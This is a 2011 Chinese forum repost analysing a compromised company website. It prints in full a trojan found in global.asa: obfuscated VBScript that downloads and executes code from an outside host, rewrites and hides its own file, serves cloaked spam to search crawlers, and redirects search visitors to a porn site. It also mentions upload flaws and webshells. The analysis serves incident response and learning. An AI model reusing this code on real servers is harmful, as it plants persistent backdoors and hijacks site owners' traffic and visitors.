|
|
转自百度博客。 Author:choit
近日,朋友的单位网站被黑,现象就是从百度搜索关键词进入第一次会弹出一个**网站,再刷新就正常进入。第一次点击进入网站时url框地址为http://www.hencao.com/hh.html?(后面为自己网站的域名),给人的感觉就是自己站的地址被人改了,当然,这事跟百度的推广没有关系(当时那网站在百度做推广,可能就是这样被黑客盯上的),不能眼看着花着自己的钱给别的网站做推广啊,而且是黄网……
通过分析整站,看来漏洞还真不少。网站是用的网上下的免费的企业整站做的,基于ewebeditor后台,无限制上传漏洞就有好几处,大马也被人传了几个,不过还算仁慈,没给你删改点什么东西。不过这些马都不是修改url的问题所在。网站根目录下有个文件十分可疑 global.asa,打开一看就更可疑了,头一行<script language="vbscript" runat="server">,还真是个马。 复制内容到剪贴板 代码:<script language="vbscript" runat="server">(这儿实际上空了n行,用来迷惑之用)'by*diao
'by*aming
sub Application_OnStart
end subsub Application_OnEnd
end subsub Session_OnStart
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t"(这写的够花的的吧,去除&“后http://www.tayequ.com/txt/globals.txt)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") (远程载入文档)
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,"by*aming")>0 then
execute GetHtml
end if
end sub'sub Session_OnEnd
'end sub
</script>
——————————————————————代码结束——————————————————————————
再来看看http://www.tayequ.com/txt/globals.txt这个文件里面都有什么,直接访问是什么都看不到的,不过可以用迅雷下载。 复制内容到剪贴板 代码:'<html><head><script>function
clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body
onload=clear()>
'<meta http-equiv=refresh
content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return
c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return
p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
'Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End FunctionPublic Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End FunctionPublic Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End FunctionFunction check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask|aol" (国内的各种搜索引擎都包括了)
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
If check(user_agent)=false Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.hencao.com/hh.html?html"&cnnbd&"") (就是这了,重新定向)
response.end
end If
end if
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
body=GetHtml("http://se.97aicn.info/html/?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
response.write body
'response.end
elseasa=GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t")
'if instr(asa,"by*diao")>0 then
' createasa(asa)
'end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)Call sleep()
'end if
end if
'</body></html>
——————————————————————代码结束——————————————————————————
包括了各种的搜索引擎,也就是说不管是从哪儿搜索,结果还是一样的,都会先打开那个黄网。当时那单位给的解决办法就是换个搜索做推广,显然是不行的。
解决办法有很多,光把马删了是不行的,尽可能的补漏洞吧~~~
把代码贴出来是用来学习的,不是让你们复制走用的
|
|
发表于 2011-11-25 15:38:09